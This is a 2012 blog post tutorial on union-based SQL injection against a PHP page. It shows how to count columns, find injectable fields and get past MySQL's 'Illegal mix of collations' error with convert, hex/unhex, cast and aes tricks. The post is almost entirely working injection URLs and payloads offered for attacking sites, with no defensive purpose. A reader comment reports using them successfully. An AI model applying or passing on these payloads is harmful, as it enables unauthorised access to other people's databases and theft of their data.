SQL Injection: Bypass "Illegal mix of collations" error

Monday, April 23, 2012

SQL Injection: Bypass "Illegal mix of collations" error

Posted by BLACK BURN at 5:39 AM 1 comments

Bypass "Illegal mix of collations" error

Here is my first tutorial to help the community, I hope it is helpful and sorry if my English is not good

Immediately started counting the columns:

Code:

http://www.yoursite.com/news_dett.php?id=30+ORDER+BY+9--

column 9 we have the error "SQL Error : Unknown column '9' in 'order clause" then the columns are 8

Proceed with a union based injection:

Code:

http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,6,7,8--

in our case the columns 1,6,7,8 are vulnerable

Proceed trying to find the version of MySQL:

Code:

http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,version( ),7,8--

At this point our error appears:

Code:

SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

There are varous ways to bypass this error:
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)

example:

Code:

http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(version( ) using latin1) ,7,8--

1 comments:

AnonymousJuly 8, 2016 at 10:09 PM
Brilliant to say the least. I successfully bypass my SQLi using your commands.

Thanks heaps,
mothered.
ReplyDelete
Replies

Add comment

BLACK BURN Moonlit

Real Money Instantly

Monday, April 23, 2012